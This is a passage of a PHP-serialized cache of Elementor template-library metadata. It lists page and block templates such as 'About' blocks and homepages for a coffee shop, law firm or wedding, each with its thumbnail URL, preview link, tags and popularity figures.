20\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_6.png\";s:12:\"tmpl_created\";s:10:\"1520443516\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-20/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"125\";s:11:\"trend_index\";s:3:\"133\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:293;a:14:{s:2:\"id\";s:4:\"5464\";s:5:\"title\";s:8:\"About 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_6.png\";s:12:\"tmpl_created\";s:10:\"1520443518\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-17/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"222\";s:11:\"trend_index\";s:3:\"218\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:294;a:14:{s:2:\"id\";s:4:\"5472\";s:5:\"title\";s:7:\"About 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_7.png\";s:12:\"tmpl_created\";s:10:\"1520443520\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"184\";s:11:\"trend_index\";s:3:\"190\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:295;a:14:{s:2:\"id\";s:4:\"5480\";s:5:\"title\";s:7:\"About 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_7-1.png\";s:12:\"tmpl_created\";s:10:\"1520443522\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-4-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"376\";s:11:\"trend_index\";s:3:\"318\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:296;a:14:{s:2:\"id\";s:4:\"5488\";s:5:\"title\";s:7:\"About 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_8.png\";s:12:\"tmpl_created\";s:10:\"1520443524\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"301\";s:11:\"trend_index\";s:3:\"283\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:297;a:14:{s:2:\"id\";s:4:\"5496\";s:5:\"title\";s:7:\"About 9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_8-1.png\";s:12:\"tmpl_created\";s:10:\"1520443526\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"412\";s:11:\"trend_index\";s:3:\"426\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:298;a:14:{s:2:\"id\";s:4:\"5504\";s:5:\"title\";s:8:\"About 18\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_9.png\";s:12:\"tmpl_created\";s:10:\"1520443528\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-18/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"87\";s:11:\"trend_index\";s:2:\"69\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:299;a:14:{s:2:\"id\";s:4:\"5515\";s:5:\"title\";s:8:\"About 19\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_9.png\";s:12:\"tmpl_created\";s:10:\"1520443530\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-19/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"251\";s:11:\"trend_index\";s:3:\"268\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:300;a:14:{s:2:\"id\";s:4:\"9139\";s:5:\"title\";s:25:\"Homepage &#8211; Business\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/07/Get_Started_250.png\";s:12:\"tmpl_created\";s:10:\"1532949924\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-business/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:167:\"[\"Agency\",\"bootstrap\",\"business\",\"corporate\",\"Landing Page\",\"marketing campaign\",\"marketing landing page\",\"product launch\",\"software\",\"Startup\",\"startup landing page\"]\";s:10:\"menu_order\";s:2:\"14\";s:16:\"popularity_index\";s:1:\"9\";s:11:\"trend_index\";s:1:\"2\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:301;a:14:{s:2:\"id\";s:3:\"147\";s:5:\"title\";s:20:\"Homepage &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0004.png\";s:12:\"tmpl_created\";s:10:\"1470829868\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/homepage-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"App\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"15\";s:16:\"popularity_index\";s:1:\"1\";s:11:\"trend_index\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:302;a:14:{s:2:\"id\";s:4:\"2402\";s:5:\"title\";s:32:\"Homepage &#8211; Interior Design\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2017/09/Interior.png\";s:12:\"tmpl_created\";s:10:\"1506441447\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:193:\"[\"Architecture\",\"building\",\"business\",\"Creative\",\"exterior design\",\"furniture design\",\"Gallery\",\"garden design\",\"house\",\"interior design\",\"landscape design\",\"multipurpose\",\"portfolio\",\"studio\"]\";s:10:\"menu_order\";s:2:\"16\";s:16:\"popularity_index\";s:2:\"46\";s:11:\"trend_index\";s:2:\"76\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:303;a:14:{s:2:\"id\";s:3:\"777\";s:5:\"title\";s:28:\"Homepage &#8211; Coffee Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/01/rest-home.jpg\";s:12:\"tmpl_created\";s:10:\"1485273092\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/homepage-coffee-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:41:\"[\"Coffee\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";s:2:\"17\";s:16:\"popularity_index\";s:2:\"65\";s:11:\"trend_index\";s:3:\"121\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:304;a:14:{s:2:\"id\";s:4:\"2404\";s:5:\"title\";s:24:\"Homepage &#8211; Product\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/09/product.png\";s:12:\"tmpl_created\";s:10:\"1506441452\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:103:\"[\"business\",\"colorful\",\"ecommerce\",\"flat\",\"mobile\",\"modern\",\"responsive\",\"retina\",\"Shop\",\"woocommerce\"]\";s:10:\"menu_order\";s:2:\"18\";s:16:\"popularity_index\";s:2:\"69\";s:11:\"trend_index\";s:2:\"94\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:305;a:14:{s:2:\"id\";s:3:\"492\";s:5:\"title\";s:25:\"Homepage &#8211; Law firm\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0024.png\";s:12:\"tmpl_created\";s:10:\"1477388365\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-law-firm/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Firm\",\"Homepage\",\"Law\"]\";s:10:\"menu_order\";s:2:\"19\";s:16:\"popularity_index\";s:1:\"6\";s:11:\"trend_index\";s:1:\"5\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:306;a:14:{s:2:\"id\";s:3:\"225\";s:5:\"title\";s:27:\"Homepage &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0016.png\";s:12:\"tmpl_created\";s:10:\"1470829872\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Homepage\",\"Restaurant\"]\";s:10:\"menu_order\";s:2:\"20\";s:16:\"popularity_index\";s:1:\"2\";s:11:\"trend_index\";s:1:\"3\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:307;a:14:{s:2:\"id\";s:4:\"3451\";s:5:\"title\";s:39:\"Homepage &#8211; Goodness meal services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/11/goodness-featured-image.png\";s:12:\"tmpl_created\";s:10:\"1512054116\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/homepage-goodness-meal-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"21\";s:16:\"popularity_index\";s:3:\"116\";s:11:\"trend_index\";s:2:\"77\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:308;a:14:{s:2:\"id\";s:4:\"2152\";s:5:\"title\";s:26:\"Homepage &#8211; Cake Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-home.png\";s:12:\"tmpl_created\";s:10:\"1499774132\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/homepage-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Cake\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";s:2:\"22\";s:16:\"popularity_index\";s:3:\"187\";s:11:\"trend_index\";s:3:\"293\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:309;a:14:{s:2:\"id\";s:4:\"1068\";s:5:\"title\";s:27:\"Homepage &#8211; Copywriter\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/copywriter.png\";s:12:\"tmpl_created\";s:10:\"1488805928\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-copywriter/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Copywriter\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"23\";s:16:\"popularity_index\";s:2:\"94\";s:11:\"trend_index\";s:3:\"156\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:310;a:14:{s:2:\"id\";s:3:\"181\";s:5:\"title\";s:23:\"Homepage &#8211; Agency\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0019.png\";s:12:\"tmpl_created\";s:10:\"1470826567\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/homepage-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"24\";s:16:\"popularity_index\";s:1:\"3\";s:11:\"trend_index\";s:1:\"7\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:311;a:14:{s:2:\"id\";s:3:\"463\";s:5:\"title\";s:22:\"Homepage &#8211; Study\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0022.png\";s:12:\"tmpl_created\";s:10:\"1477388340\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/homepage-study/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Education\",\"Homepage\",\"Study\"]\";s:10:\"menu_order\";s:2:\"25\";s:16:\"popularity_index\";s:1:\"5\";s:11:\"trend_index\";s:1:\"6\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:312;a:14:{s:2:\"id\";s:4:\"2813\";s:5:\"title\";s:32:\"Homepage &#8211; Creative Agency\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2017/11/Creative-Agency-–-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1509615049\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-creative-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"26\";s:16:\"popularity_index\";s:2:\"55\";s:11:\"trend_index\";s:2:\"72\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:313;a:14:{s:2:\"id\";s:3:\"728\";s:5:\"title\";s:33:\"Homepage &#8211; Delivery Company\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/01/delivery-company-home-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485269993\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/homepage-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Delivery\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"27\";s:16:\"popularity_index\";s:3:\"129\";s:11:\"trend_index\";s:3:\"199\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:314;a:14:{s:2:\"id\";s:4:\"2403\";s:5:\"title\";s:29:\"Homepage &#8211; Luxury Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/09/Hotel.png\";s:12:\"tmpl_created\";s:10:\"1506441428\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/homepage-luxury-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"28\";s:16:\"popularity_index\";s:3:\"143\";s:11:\"trend_index\";s:3:\"174\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:315;a:14:{s:2:\"id\";s:3:\"519\";s:5:\"title\";s:24:\"Homepage &#8211; Fitness\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0023.png\";s:12:\"tmpl_created\";s:10:\"1477388808\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-fitness/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Fitness\",\"Gym\",\"Health\",\"Homepage\",\"Sport\"]\";s:10:\"menu_order\";s:2:\"29\";s:16:\"popularity_index\";s:1:\"7\";s:11:\"trend_index\";s:1:\"9\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:316;a:14:{s:2:\"id\";s:4:\"1903\";s:5:\"title\";s:20:\"One Page &#8211; Spa\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2017/06/spa.png\";s:12:\"tmpl_created\";s:10:\"1496822325\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/one-page-spa/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:132:\"[\"beauty\",\"care\",\"girly\",\"hair\",\"Health\",\"hospitality\",\"massage\",\"medical\",\"parlor\",\"physiotherapy\",\"salon\",\"spa\",\"wellness\",\"yoga\"]\";s:10:\"menu_order\";s:2:\"30\";s:16:\"popularity_index\";s:3:\"101\";s:11:\"trend_index\";s:3:\"146\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:317;a:14:{s:2:\"id\";s:4:\"2123\";s:5:\"title\";s:33:\"One Page &#8211; Architect Office\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/06/architect.png\";s:12:\"tmpl_created\";s:10:\"1499772989\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/one-page-architect-office/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"31\";s:16:\"popularity_index\";s:1:\"8\";s:11:\"trend_index\";s:1:\"8\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:318;a:14:{s:2:\"id\";s:4:\"1888\";s:5:\"title\";s:32:\"One Page &#8211; Creative Meetup\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2017/06/creative-meetup.png\";s:12:\"tmpl_created\";s:10:\"1496822319\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/one-page-creative-meetup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"32\";s:16:\"popularity_index\";s:3:\"133\";s:11:\"trend_index\";s:3:\"203\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:319;a:14:{s:2:\"id\";s:4:\"1880\";s:5:\"title\";s:24:\"One Page &#8211; Wedding\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/06/wedding.png\";s:12:\"tmpl_created\";s:10:\"1496822317\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/one-page-wedding/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"bride\",\"ceremony\",\"cute\",\"event\",\"fancy\",\"girly\",\"groom\",\"guestbook\",\"marriage\"]\";s:10:\"menu_order\";s:2:\"33\";s:16:\"popularity_index\";s:3:\"315\";s:11:\"trend_index\";s:3:\"395\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:320;a:14:{s:2:\"id\";s:4:\"1891\";s:5:\"title\";s:35:\"One Page &#8211; Textile Convention\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/06/textile-meetup.png\";s:12:\"tmpl_created\";s:10:\"1496822323\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/one-page-textile-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"34\";s:16:\"popularity_index\";s:3:\"285\";s:11:\"trend_index\";s:3:\"336\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:321;a:14:{s:2:\"id\";s:4:\"1885\";s:5:\"title\";s:29:\"One Page &#8211; Yacht Rental\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/06/yacht-home.png\";s:12:\"tmpl_created\";s:10:\"1496822321\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/one-page-yacht-rental/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"35\";s:16:\"popularity_index\";s:3:\"109\";s:11:\"trend_index\";s:3:\"171\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:322;a:14:{s:2:\"id\";s:4:\"2723\";s:5:\"title\";s:34:\"Portfolio &#8211; Graphic Designer\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/11/Graphic-Designer-–-Portfolio.png\";s:12:\"tmpl_created\";s:10:\"1509633883\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/portfolio-graphic-designer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"36\";s:16:\"popularity_index\";s:3:\"107\";s:11:\"trend_index\";s:3:\"153\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:323;a:14:{s:2:\"id\";s:4:\"2145\";s:5:\"title\";s:30:\"About &#8211; Delivery Company\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-about.png\";s:12:\"tmpl_created\";s:10:\"1499774125\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/about-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:10:\"[\"moving\"]\";s:10:\"menu_order\";s:2:\"37\";s:16:\"popularity_index\";s:3:\"213\";s:11:\"trend_index\";s:3:\"258\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:324;a:14:{s:2:\"id\";s:4:\"2155\";s:5:\"title\";s:23:\"About &#8211; Cake Shop\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-about.png\";s:12:\"tmpl_created\";s:10:\"1499774130\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/about-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:8:\"[\"Food\"]\";s:10:\"menu_order\";s:2:\"38\";s:16:\"popularity_index\";s:3:\"293\";s:11:\"trend_index\";s:3:\"356\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:325;a:14:{s:2:\"id\";s:4:\"1085\";s:5:\"title\";s:21:\"About &#8211; Startup\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/03/Startup.png\";s:12:\"tmpl_created\";s:10:\"1488810874\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/about-startup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:19:\"[\"About\",\"Startup\"]\";s:10:\"menu_order\";s:2:\"39\";s:16:\"popularity_index\";s:1:\"4\";s:11:\"trend_index\";s:1:\"4\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:326;a:14:{s:2:\"id\";s:3:\"143\";s:5:\"title\";s:22:\"About &#8211; Personal\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0010.png\";s:12:\"tmpl_created\";s:10:\"1470820447\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-personal/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"About\",\"Personal\"]\";s:10:\"menu_order\";s:2:\"40\";s:16:\"popularity_index\";s:2:\"16\";s:11:\"trend_index\";s:2:\"21\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:327;a:14:{s:2:\"id\";s:3:\"101\";s:5:\"title\";s:16:\"About &#8211; CV\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0018.png\";s:12:\"tmpl_created\";s:10:\"1470829785\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:98:\"https://library.elementor.com/about-cv/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:77:\"[\"creative portfolio\",\"Personal\",\"portfolio\",\"professional\",\"resume\",\"vcard\"]\";s:10:\"menu_order\";s:2:\"41\";s:16:\"popularity_index\";s:2:\"23\";s:11:\"trend_index\";s:2:\"31\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:328;a:14:{s:2:\"id\";s:3:\"140\";s:5:\"title\";s:25:\"About &#8211; Art 